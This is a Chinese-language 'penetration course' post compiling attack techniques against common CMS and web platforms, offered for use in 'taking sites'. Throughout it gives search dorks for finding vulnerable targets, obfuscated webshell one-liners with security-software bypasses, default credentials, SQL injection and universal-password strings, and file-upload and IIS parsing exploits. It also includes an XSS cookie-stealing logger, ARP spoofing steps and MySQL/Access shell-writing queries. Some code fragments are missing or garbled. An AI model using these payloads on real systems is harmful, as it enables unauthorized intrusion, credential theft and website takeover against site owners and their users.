【渗透课程】特别篇-主流网站程序Oday大全以及拿shell思路

版权和内容说明：

这篇文章不是本站编写,是从网络上摘抄的,可是通过了本站的改写优化,并将内容,格式规范化。

本篇说明：这篇文章结合了前辈们前几年一路挖掘出来的主流程序漏洞以及思路, 小编写在前面是想让你们大体了解一下,由于《渗透课程》之后的内容,就是围绕着本篇所涉及的内容进行深度逻辑原理剖析。

这是一篇比较彻底的基本渗透笔记。看不懂不要紧,后面会一一讲解不过本章的内容读者们要尽可能保存,可能会在拿站的时候应用到呢！

常见网站程序asp类：

foosun(风讯)

kesion(科汛)

newasp(新云)

乔客CreateLive(创力)

5uCMSKingCMS

DvBBS(动网)

BBSxp[博客]zblog

PHP类：

DeDeCms（织梦）

ECMS（帝国）

PHPCMS

PHP168

HBcms（宏博）SupeSite

CMSware(思惟)Joomla!

[BBS]Discuz!

[BBS]phpWind[SNS]UCenterHome

[SNS]ThinkSNS[商城]EcShop

[商城]ShopEx[博客]WordPress

[维基]HDWiki

[微博]PHPsay[DIGG]PBdigg

PHP程序来源默认绝对路径

开源系统 数据库配置文件名 文件名所在的目录

Discuz! config.inc.php ./ config.inc.php

Phpcms config.inc.php ./include/config.inc.php

Wodpress wp-config.php ./ wp-config.php

Phpwind sqlconfig.php ./data/sqlconfig.php

phpweb config.inc.php ./config.inc.php

Php168v6 mysql_config.php ./php168/ mysql_config.php

Shopex config.php ./config/config.php

Ecshop config.php ./data/config.php

Joomla configuration.php ./ configuration.php

UCenter config.inc.php ./data/config.inc.php

EmpireCMS config.php ./e/class/config.php

Dedecms common.inc.php .data/common.inc.php

Zen Cart configure.php ./includes/configure.php

Mediawiki localsettints.php ./config/localsettints.php

Ecshop config.php ./data/config.php

osCommerce configure.php ./includes/configure.php

【 谷歌语法 】

site：能够限制你搜索范围的域名.

inurl：用于搜索网页上包含的URL，这个语法对寻找网页上的搜索，帮助之类的颇有用.

intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)

intitle: 查包含关键词的页面，通常用于社工别人的webshell密码

filetype：搜索文件的后缀或者扩展名

intitle：限制你搜索的网页标题.

link: 能够获得一个全部包含了某个指定URL的页面列表.

查找后台地址：site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

查找文本内容：site:域名 intext:管理|后台|登录|用户名|密码|验证码|系统|账号|admin|login|sys|managetem|password|username

查找可注入点：site:域名 inurl:aspx|jsp|php|asp

查找上传漏洞：site:域名 inurl:file|load|editor|Files

找eweb编辑器：site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

存在的数据库：site:域名 filetype:mdb|asp|#

查看脚本类型：site:域名 filetype:asp/aspx/php/jsp

迂回策略入侵：inurl:cms/data/templates/images/index/

网络设备关键词：intext:WEB Management Interface for H3C SecPath Series

【 一句话木马 】

asp一句话木马：<%eval request(“x”)%>

php一句话木马：

aspx一句话：<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>
网站配置、版权信息专用一句话：”%><%Eval Request(x)%>

一句话再过护卫神：<%Y=request(“x”)%> <%execute(Y)%>

过拦截一句话木马：<% eXEcGlOBaL ReQuEsT(“x”) %>

asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

能过安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句话：<%Y=request(“x”)%> <%eval(Y)%>

elong过安全狗的php一句话：

后台经常使用写入php一句话（密码x）：

<?
$fp = @fopen(“c.php”, ‘a’);
@fwrite($fp, ‘<‘.’?php’.”rnrn”.’eval($_POST[x])’.”rnrn?”.”>rn”);
@fclose($fp);
?>

高强度php一句话：

新型变异PHP一句话(密码b4dboy):
($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句话：<%@ Page Language=”C#” ValidateRequest=”false” %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破护卫神，保护盾一句话：

许多网页程序都不容许包含〈%%〉标记符号的内容的文件上传，这样一句话木马就写入不进数据库了。
改为：〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉
这样就避开了使用〈%%〉，保存为.ASP,程序照样执行的效果是同样的。

PHP高强度一句话：
菜刀链接：/x.php?x=lostwolf 脚本类型：php 密码：c
菜刀链接 躲避检测 密码：c

【 解析漏洞总结 】

IIS 6.0

目录解析：/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt)，文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。

后缀解析：/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。

默认解析：/xx.asa /xx.cer /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还包含这三种
此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
IIS 7.0/ IIS 7.5/ Nginx <8.03
在默认Fast-CGI开启情况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

经常使用利用方法： 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码以后，避免破坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容 ’);?>
意思为写入一个内容为 名称为shell.php的文件
找个地方上传 xy.jpg ,而后找到 xy.jpg 的地址，在地址后加上 /xx.php 便可执行恶意文本。
.而后就在图片目录下生成一句话木马 shell.php 密码 cmd

【 ewebeditor编辑器 】

默认后台：ewebeditor/admin_login.asp

账号密码：admin admin

样式设计：ewebeditor/admin_style.asp

查看版本：ewebeditor/dialog/about.html

数据库路径：db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)

遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..

跳转目录：ewebeditor/admin_uoloadfile.asp？id=14&dir=.. (dir为列目录, ..为返回上层目录)，形式:dir ../..
点上传文件管理-随便选择一个样式目录，获得：ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../本身加减)

( ewebeditor5.5版本 )

默认后台：ewebeditor/admin/login.asp

账号密码：admin 198625

数据库路径：data/%23sze7xiaohu.mdb

遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面：ewebeditor/ewebeditor.htm?id=body&style=popup
( ewebeditor3.8 php版本 )

默认后台：eWebEditor/admin/login.php
首先随便输入一个账号和密码，接着系统会提示出错，这时清空浏览器的url，而后输入如下代码后连按三次回车键：
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));
接着访问文件：ewebeditor/admin/default.php 就能够直接进入后台了。

( ewebeditor编辑器exp手册 )

有时候什么后缀都上传了，仍是不行。就增长一个asp:jpg格式 上传asp:jpg 试试

一：文件上传成功了，可是访问不成功，说明该目录(好比：/UploadFile)被设置了权限，返回去换成/ 上传到根目录就好了.增长asp等不行的时候，能够利用解析asp;jpg

二：下载数据库查看前人留下的痕迹，再访问上传页面拿shell。

页面路径：/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目，把S_ID跟S_Name的值替换在语句里访问，上传相对应的格式木马。

【 fckeditor编辑器 】

查看版本：fckeditor/editor/dialog/fck_about.html

编辑器页面：FCKeditor/_samples/default.html

上传页面：fckeditor/editor/filemanager/connectors/test.html

遍历目录：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

编辑页面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

查看文件上传路径：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

( 拿shell方法总结 )

ASPX的站几乎都用fck编辑器，建议用工具扫一下，记住inc目录下可能存在fck编辑器，扫下这个目录。

一：若是是iis6.0，上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者建立x.asp目录，再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 均可以完美解析拿下shell

二：第一次上传1.asp;1.jpg，被重命名为：1_asp;1.jpg，可是第二次上传1.asp;1.jpg，就有可能变成：1.asp;1(1).jpg

三：iis7.5+fck的解析文件为：a.aspx.a;.a.aspx.jpg..jpg.aspx

四：若是不是iis6.0 上传1.asp;jpg而后抓包，接下来改包，将分号变成空格，再用c32把20改为00，保存，利用%00 截断分号两次

五：成功访问别人的一句话木马页面，http://xx.com/UploadFilesEditorFilefile/2.asp;2(1).jpg 但不知道密码
http://xx.com/UploadFilesEditorFilefile2_asp;2.jpg 这个是图片木马，没有成功利用iis6.0解析漏洞仍是图片，下载下来用记事本打开找到密码。

六：IIS7.0/7.5 通杀oday，把php一句话木马后缀改为1.jpg传上去，找出一句话的路径后，在1.jpg的后面添加/.php 例如：http://www.xxx.com/iges/php.jpg/.php
( 创建文件夹 . 变 _ 的突破方法 )
利用Fiddler web debugger 这款工具来进行修改数据包，从而达到突破的目的。
注意：安装Fiddler web debugger，须要安装.net环境以及.net的SP2补丁方可运行！

1.打开fck的上传页面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html

2.再打开Fiddler web debugger这款工具，点击设置–自动断点–选择 “请求以前”

3.接着打开fck的上传页面，建立文件夹，并输入你想要建立的文件名，例如：x.asp

4.而后返回到Fiddler web debugger这款工具里，选择连接–点击右侧的嗅探

5.修改currentfolder内的参数，改为你要创建的文件夹名字，如：x.asp

6.而后点击右侧的：run to completion

7.再点击软件设置–自动断点–禁用，再到浏览器里点击肯定创建文件夹，你就会发现文件夹创建为x.asp了

【 linux 】

解析格式：1.php.xxx (xxx能够是任意)
若是apache不认识后缀为rar的文件，咱们就用1.php.rar格式上传，文件就会被服务器当作PHP脚本解析。

辨别linux系统方法：例如：http://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问，若是出错了，就说明是linux系统，反之是windows系统.

【 旁注 】

旁注的技巧就是挑选支持aspx的站来日，这样提权时候但愿较大，如何探测服务器上哪些站点支持aspx呢? 利用bing搜索：http://cn.bing.com/ 搜索格式：ip:服务器ip aspx
好比要入侵一个网站，想知道该网站支不支持aspx，就在网站后面随便加上一个xxx.aspx回车，若是显示的不是iis默认的错误页面，而是这种：“/”应用程序中的服务器错误，说明支持aspx马。

【 phpmyadmin 】

查看版本：test.php 或 phpinfo.php

默认帐号密码：root root

万能账号密码：’localhost’@’@” 密码空

拿shell第一种方法：
CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL );
INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (‘ ’);
SELECT darkmoon1 FROM darkmoon INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS darkmoon;

拿shell第二种方法：
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘ ’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第三种方法：
select ‘ ’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第四种方法
select ‘ ’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user

找到mysql数据库，执行sql语句便可写入一句话，再菜刀链接便可。

phpmyadmin脱裤

在这里面是能够直接拖库的，如同上传php拖库脚本同样，操做差很少的。
修改mysql默认的root用户名方法:
进入phpmyadmin,进入mysql表,执行sql语句

1.update user set user=’你的新root用户名’ where user=’root’;

2.flush privileges;
例如：
用root身份登入，进入mysql库，修改user表便可。

1.use mysql;

2.mysql>update user set user=’newName’ where user=’root’;

3.mysql> flush privileges;

【 万能密码 】

( php )
账号：’ UNION Select 1,1,1 FROM admin Where ”=’
密码：1

( asp )

‘xor

‘or’=’or’
‘or”=”or”=’
‘or ‘1’=’1’or ‘1’=’1
‘or 1=1/*

【 批量关键词 】

inurl:asp?id=

inurl:detail.php?

CompHonorBig.asp?id= 很不错的的一个搜索注入点

inurl:show.asp? 很是强大

site:www.yuming.com

inurl:articleshow.asp?articleid=数字

inurl:szwyadmin/login.asp

inurl:asp?id=1 intitle:政府

杭州 inurl:Article_Class2.asp?

 

【 木马后门 】

1.TNTHK小组内部版 —— 存在关键词后门，随便输入一个错的密码，右键查看源文件，找到错误关键词后面的font，在font后面的就是正确密码。

2.不灭之魂—不死僵尸变种 —— 用这款工具专门爆这款大马的密码：爆不灭之魂密码

3.终极防删免杀多功能VIP版本-无后门 —— 万能密码：wbgz 菜刀链接：kk

【 安全狗 】

1.过注入

方法一：a.asp?aaa=%00&id=sql语句

方法二： a.asp?id=sql语句 里面把安全过滤的加个%l 好比： un%aion sel%aect 1,2,3,4 fr%aom admin

2.过大马被阻拦访问

方法一：上传一个大马 而后访问http://sss.com/dama.asp ; 访问后出现拦截。
那么解决方法 先将dama.asp更名dama.jpg上传，而后在同目录上传个文件da.asp 内容为： <!–#include file=”dama.jpg” –> 这样再访问da.asp 就不会被拦截了。

3.过菜刀链接一句话被拦截

方法一：不用菜刀链接一句话，用别的一句话链接端。

方法二：中转下链接菜刀，把过滤掉的词替换掉。

【 本地构造上传漏洞 】

寻找程序上传漏洞，必须从上传页面的源文件入手，目标有两个：

1.filename (文件名称) 在上传页面中针对文件扩展名过滤不严，从而上传可执行的脚本木马。

2.filepath (文件路径) 在上传页面针对路径过滤不严，致使能够修改上传相对路径上传脚本木马。

当检测到一个上传页面，asp、asa后缀已经被过滤掉的时候，能够尝试抓包明小子或NC上传！

不行就利用本地上传漏洞构造上传！例如上传页面是：http://www.xx.com/upfile_other.asp

1.右键查看源文件，找到这段代码：

把以上代码中actino处的路径补全！即：

 

 

2.再找到这段代码：

利用IIS6.0解析漏洞，把以上代码中value处的文件补全！即： 注意：冒号后面有空格！

3.接着保存为1.html，将刚保存的文件拖进去C32里，选择十六进制模式，找到“1.asa; ”后面的空格，将其填充为00后保存退出！

4.本地打开上传图片格式的木马(不成功时能够尝试上传一句话木马) ，若是提示成功后不显示路径的话，能够右键查看源文件本身手工找出路径访问便可！

【 利用双文件上传拿shell 】

由于网站只判断一次，若是第一个文件后缀是在白名单里面的话，就让其上传，并无判断第二个文件，因此上传任意格式的文件也让其经过。

当系统验证cookie的时候，就要用到火狐浏览器了，登陆网站进后台，让火狐浏览器保存管理员的cookie值，再把修改后的“双文件上传工具”拖进去上传。

1.在后台找上传点，右键查看源文件，找到上传地址，通常在post或action的附近，搜索便可找到，通常为：src=”../xxx.htm” 以后补全路径访问。

2.这个还不是真正的上传页面，真正的上传页面后缀是asp的，继续查看源代码，找到action=”xxx.asp”，补全路径访问便可！

4.其实也能够抓包从而得到上传路径，抓包以后，在Referer:这栏，还有常见的是：htto://www.xxxx.com/upfile_other.asp

3.打开双文件上传工具，替换为当前的上传地址，保存后拖进火狐浏览器里，第一个选择jpg木马，第二个选择cer木马，提交后右键查看源文件找出路径便可。

【 数据库备份抓包改包NC提交拿shell 】

当备份路径不能修改,后缀又是mdb不变的时候，咱们可先对备份的过程进行抓包，再本地构造用NC提交便可突破备份，数据库恢复也可以使用此方法！

在抓包的时候，最好用火狐浏览器，由于有的浏览器抓不到包，首先上传一张图片木马复制下地址，接着对备份过程进行抓包！把抓到的数据复制在文本里面！

开始本地修改，先把POST处补全网址，找到最底下的一行数据，再复制多一行对比长度进行修改，把备份的数据名称替换为木马地址，备份的名称改成本身想要的asp后缀！
再将原来的数据长度跟如今的对比同时替换掉，最后看一共增长了多少个字符，就在Content-Length:处进行增减，用NC提交数据格式：nc 域名 80<1.txt

【 本地构造数据库备份突破拿shell 】

当上传jpg木马获得路径前去备份时，发现数据库备功能用不了的状况下，能够尝试本地构造突破拿shell！

首先查看源文件，找到“当前数据库路径”修改成刚上传jpg木马的路径，再找到“数据库备份名称”修改成1.asa
找到“

“将路径补全”

 

”

最后保存为1.html，有的网站不验证cookie的话，直接打开进行备份就能成功了，可是通常都须要验证cookie，这时就用上火狐浏览器了。

 

由于火狐浏览器有保留cookie的功能，先登陆后台，以管理员的权限进行上传，直接把1.html拖进火狐浏览器里，直接点击备份便可突破cookie验证！

【 本地构造限制上传类型漏洞 】

通常用于直接扫到的上传页面，名称是：上传图片，上传asp、asa等脚本时提示“请选择jpg或gif文件!”
这时经过这个方法通常都能成功，首先保存到本地1.asp 放到小旋风的目录下，而后找到如下这段代码：
alert(“请点击浏览按钮，选择您要上传的jpg或gif文件!”)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=”.jpg” && extname!=”.gif”)
{
alert(“请选择jpg或gif文件!”);
看到这句代码：if(extname!=”.jpg” && extname!=”.gif”) 改成： if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)

而后补充完整上传地址，action=这里，而后网页打开127.0.0.1 直接上传asp文件就能够了。

【 抓包改包NC提交拿shell 】

1.抓包数据中若是存在name=”filepath”或是name=”filename”，那么就能够知足NC的上传条件了。

2.将木马的抓包数据复制到文本文件中。例如：1.txt

3.将路径补全：
filepath截断法：
uploadfile/路径后添加1.asp空格 (16进制下面将20改成00)

filename自定义名称：
C:Documents and Settingslei桌面1.jpg (将1.jpg 改成 1.asp空格，16进制下将20改成00)

3.在Content-Length处加上../uploadfile/后增长的字节数。

4.用C32将空格的20改成00，保存为1.txt。

5.把1.txt跟nc.exe放在同一目录下，cmd命令：nc -vv www.XXXX.com 80<1.txt
( 若是上传成功后没有将木马解析成asp，能够尝试将文件名改为asa、cer、php 再不行就用IIS 6.0解析漏洞，将文件名改成1.asa;1.jpg )

【 抓包nc上传获取管理权限 】

这个方法至关于cookie欺骗，首先到前台去注册一个会员，注册成功后在登陆的那一刻，用抓包工具进行抓包，把抓到的数据复制到1.txt里面。

接下来打开，把双引号里棉的数据“X-Forwarded-For: 127.0.0.2’,group_id = 1 where loginname = ‘会员的账号’#” 放在Content-Length：的下面。

在看到最底下的loginname=这行代码，把最后面的验证码改为当前会员登录的验证码，而后将nc1.txt 放在同一个目录下，cmd命令：nc 域名 80选择服务器IP一项->在路由追踪一项取消所有->肯定。

设置完毕后点击一下激动按钮(中间那个)，再点击嗅探器，点击加号符号，选择全部在子网主机，选择ARP测试(传播 31-位)，肯定。
扫描完毕选择网关一项，点击ARP，点击加号符号，左边选择网关，右边选择所有的C段，肯定，点击开始嗅探按钮(第三个)，嗅探到的账号密码在口令一项展示！

若是发现没数据可使用幻境网盾来限制网速，让cain的发包跨过防火墙

【 arp欺骗 】

只要该服务器存在C段，均可以尝试arp欺骗，用到的工具是NetFuke，想知道arp劫持能不能成功，cmd命令：arp -a 看一下，动态的服务器IP就能成功，静态的就不能。

安装完运行主控端，设置–嗅探设置–网卡选择服务器的IP–控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 肯定。

设置–ARP欺骗–双向欺骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目标IP填要欺骗的任意C段ip(用御剑扫描C段)–肯定。

插件管理–修改器–最后一个选项双击–在右边的HTML Body = [haha!!] 填写本身要展示的文字，点击开始便可欺骗成功！

【 突破安全狗防注入及上传 】

写入webshell 写不进去，日常的一句话 也失效，用这段代码：
<%@ Page Language=”C#” ValidateRequest=”false” %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“admin163.net”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
链接端用cncert的aspx一句话客户端

二、IIS6.0解析漏洞遇到安全狗
文件名为http://www.baicai.com/1.asp;1.jpg
这样的会被IIS安全狗果断屏蔽
改为以下名称,IIS6同样会解析:
www.baicai.com/;1.asp;1.jpg

三、安全狗的注入绕过
经常使用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。

但这样就能够突破了：
baicai.asp?0day5.com=%00.&id=69%20 and 1=1

【 跨站xss 】

在网站留言或者能输入信息的地方提交跨站代码，从而盗取管理员cookie，而后用cookie浏览器直接进入后台，将如下代码保存为asp文件，例如1.asp<% thisfile=Server.MapPath(“cookie.txt”) msg=Request(“msg”) set fs=server.CreateObject(“scripting.filesystemobject”) set thisfile=fs.OpenTextFile(thisfile,8,True,0) thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉大侠”) thisfile.close set fs=nothing %>

首先搭建一个asp环境，推荐使用“ASP服务器（摆脱安装IIS）” 再将1.asp放在wwwroot目录下，访问1.asp文件若是提示下载，则说明搭建成功了。

而后在留言板的“您的网站”一处输入：
当管理员浏览咱们提交的留言时，将在wwwroot目录下生成一个cookie.txt文件，这时咱们只要访问cookie.txt这个文件，就能知道管理员的cookie是多少了！

而后再使用桂林老兵的cookie欺骗工具或是网页源代码查看分析器，访问网站再输入cookie进行欺骗登陆便可！（填cookei的时候记得选择自定义）
小技巧：要想让管理员早点浏览你提交的留言，能够经过打电话，QQ客服等去社工他便可。

【 爆库 】

%5C为十六进制的符号，而数据库大于5.0就能够爆库，若一个网站数据库大于5.0，且是ACESS数据库，若不能注入的注入点是：http://www.xxx.com/rpc/show24.asp?id=127
咱们直接把%5C加到rpc后面，由于%5C是爆二级目录，因此应该是这样，http://www.xxx.com/rpc%5c/show24.asp?id=127
而%23是表明#，若是管理员为了防止他人非法下载数据库，而把数据库改为#database.mdb,这样防止了。

若是页面地址为：http://www.xx.com/rpd/#database.mdb ; 把%23替换#就能够下载了，即：http://www.xx.com/rpd/%23database.mdb
还有利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 若是没有修改默认的数据库路径，也能够获得数据库的路径（注意：这里的/也要换成%5c）

若是你能看到：’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 肯定路径名称拼写是否正确，以及是否链接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

【 利用sql注入点判断网站和数据库是否站库分离 】

在注入点后加上：and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))

注意admin必定要是存在的表段，若是返回正常，说明网站和数据库是在同一服务器，若是不正常则说明是站库分离的。

【 iis6.0 PUT写入漏洞 】

利用工具：IIS PUT Scaner、桂林老兵IIS写权限利用程序

一、IIS来宾用户对网站文件夹有写入权限

二、web服务器扩展力设置webDAV为容许，即：WebDAV—打勾

三、网站主目录:写入—打勾(可PUT)

四、网站主目录:脚本资源访问—打勾（可COPY、MOVE）

你们都清楚，写权限就是容许PUT，与网站自身运行的权限无丝毫联系，若是开启了，就是没有一点安全意识，就给咱们提供了大大的方便。

首先用御剑工具扫下C段，好比：12.12.12.1 – 12.12.12.255 打开IIS PUT Scaner，把12.12.12.1放在Start IP 这里，12.12.12.255放在End IP 这里，

接着在Port这里，换成80，点击Scan开始嗅探，当PUT这里显示是Yes就说明存在漏洞，能够右键选择PUT file，输入文件名1.txt，下面填内容，保存就能够写入了。
或是利用“桂林老兵IIS写权限利用程序”也能够，这款工具比较强大，把域名填写进去，例如：www.xxx.com，而后在请求文件那里输入你的文件名，

在数据包格式那里选择PUT，有的会直接弹出浏览文件框，没有就本身选择，在下面，而后点击提交数据库便可，通常是先PUT一个txt文件，再MOVE成asp木马。
直接提交asp木马的话，若是MOVE方法不行，能够试试Copy。
==========================================================================================================================

【 ACCESS执行SQL语句导出一句话拿webshell 】

原理大体和php网站的outfile差很少，在access后台其余方法不能拿到webshell，可是后台有SQL语句查询执行，就能够直接access导出一句话拿webshell了。不过须要知道物理路径才能导出，利用IIS的解析漏洞导出EXCEL文件拿到webshell，由于ACCESS数据库不容许导出其余危险格式，咱们导出为EXCEL后在利用IIS解析漏洞就能够变成咱们的木马了。
点“服务器信息探测”，得到网站路径：e:webwebshellcc的EXCEL 点“系统管理”-》“自定义执行SQL”，试一下，可以执行的话能够用access导一句话拿下shell。
create table cmd (a varchar(50)) 创建一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
insert into cmd (a) values (‘<%execute request(chr(35))%>’) 在表cmd的a字段插入密码为#的一句话木马
select * into [a] in ‘e:webwebshellcc1.asa;x.xls’ ‘excel 4.0;’ from cmd 把cmd表a的内容导出到路径e:webwebshellcc的EXCEL文件
drop table cmd 删除创建的cmd表
菜刀链接：http://www.xxx.com/1.asa;x.xls
==========================================================================================================================

【 利用过滤’or’=’or’修改代码进行绕过 】

例如后台地址是：http://www.hdminc.net/admin/admin_index.asp
当用万能密码登陆的时候，会出现一些过滤or的提示！

请右键查看源文件，另存为桌面 XX.html，而后打开找到如下这段代码，进行删除！

注意：将如下段代码中的 “index.asp?action=chkadmin” 修改成 “http://www.hdminc.net/admin/admin_index.asp”

最后保存打开，再用’or’=’or’登陆时，系统已再也不过滤，结果就能用万能密码登陆进去了！

 

==========================================================================================================================

【 动力3.5拿shell 】

inurl:printpage.asp?ArticleID=

1.找到版权信息，把内容替换成：

版权全部 Copyright? 2003 动力空间” ‘版权信息
if Request(“xiaoxin”)=”520″ then
dim allen,creat,text,thisline,path
if Request(“creat”)=”yes” then
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))
outfile.WriteLine Request(“text”)
Response.write “小新恭喜”
end if
Response.write “

”
Response.write “ ”&thisline&”
”
Response.write “ ”
Response.write “

”
Response.end
end if
%>2.而后保存，千万别跳转任何页面，直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=5203.成功后会进入一个像小马同样的页面，粘贴木马代码以及写上木马文件名便可拿到wshell，木马在inc目录。
==========================================================================================================================

 

【 aspcms】

简要描述：后台文件AspCms_AboutEdit.asp 未进行验证，且未过滤，致使SQL注入。
爆账号密码：
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
版本不一样须要更改值。

第二种方法，找到后台，而后/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn
& smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1
& LanguageID=1[/php]
再链接配置文件config.asp 密码为#

老版本中能够经过添加模板直接添加asp.可是新版已经限制了添加模板的格式为html,js,css
固然若是是遇到iis6的话仍是能够经过iis6的解析漏洞把文件名改为1.asp;.html这样的格式来拿到shell的.

方法：点击“界面风格”，而后选“编辑模板/CSS文件”，而后“添加模板”，文件名称写error.asp;.html，文件内容写一句话<%eval request(“g”)%>

而后添加，会提示添加成功，而后在模板列表中就能够找到咱们添加的一句话了，用菜刀链接便可！
但是若是遇到iis7.5呢? 如下是本人本身找到挖掘到的aspcms通杀版本的后台拿shell方法.

一、进入后台，“扩展功能”–“幻灯片设置”–”幻灯样式”

二、使用chorme的审查元素功能或者firefox的firebug，总之使用能修改当前页面元素的工具就行了，将对应的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><% 三、一句话木马，密码a。在/config/AspCms_Config.asp ==========================================================================================================================

【 XYCMS企业建站系统 】

关键词：inurl:showkbxx.asp?id= 默认数据库：data/xy#!123.mdb 默认帐户密码：admin admin 找到网站配置，在网站名称里面直接插入一句话：网站”%><%eval request(“x”)%><%’，注意不要删掉网站名称！而后中国菜刀链接：/inc/config.asp

【 szwyadmin漏洞绕事后台验证 】

关键字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1″));

1.后台通常存在一个szwyadmin文件夹，复制一下后台地址放在一边，以后复制代码替换后台地址访问进行注射！

2.这时会弹出一个窗口，连续点击三次肯定。

3.从新访问后台地址，把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了！
==========================================================================================================================

【 医院建站系统任意文件上传漏洞 】

关键词：inurl:cms/Column.aspx?
关键词：inurl:cms/Column.aspx?LMID=
漏洞利用 ：xtwh/upfile.aspx
直接上传aspx木马拿shell。
==========================================================================================================================

【 嘉友科技cms上传漏洞 】

谷歌关键字：inurl:newslist.asp?NodeCode=
程序采用的上传页uploadfile.asp未进行管理验证，致使创建畸形目录上传图片木马获取shell漏洞。
exp：ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
并且他的上传文件没有过滤致使未受权访问，直接上传小马，而后小马后面写为1.jpg 访问路径 查看源代码。
==========================================================================================================================

【 ecshopcms后台拿shell 】

支持最新2.7.2版本，通杀最新版本后台低权限！

